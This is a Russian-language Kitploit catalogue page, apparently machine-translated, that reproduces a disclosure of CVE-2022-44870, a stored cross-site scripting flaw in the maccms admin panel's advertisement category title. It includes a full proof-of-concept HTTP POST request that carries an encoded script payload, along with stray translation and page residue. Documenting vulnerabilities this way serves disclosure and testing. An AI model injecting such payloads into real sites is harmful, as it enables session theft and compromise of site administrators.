Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-44870 — maccms admin+ xss атаки | Kitploit
Инструменты/GitHubGitHub/cedric1314/cve-2022-44870
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubcedric1314/cve-2022-44870

CVE-2022-44870

maccms admin+ xss атаки

Репозиторий
23 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-44870

maccms admin+ XSS-атаки

Обзор

Информация о сайте производителя: https://maccms.pro

Адрес загрузки исходного кода: https://github.com/maccmspro/maccms10.git

  1. Затронутая версия: V2021.1000.2000

    图片
  2. Детали уязвимости

https://github.com/maccmspro/maccms10/issues/23

Перейдите в панель администратора, затем в «Основные» > «Управление рекламой» > «Название».

Вставьте payload1 в поле названия:

Это может привести к XSS-атакам.

Название уязвимости: Хранимая XSS

Уровень уязвимости: Средний риск

Местоположение уязвимости: Управление рекламой → название

Вставьте в cat_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

图片

图片
  1. Воспроизведение уязвимости и POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin:

Скачать инструмент
http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

图片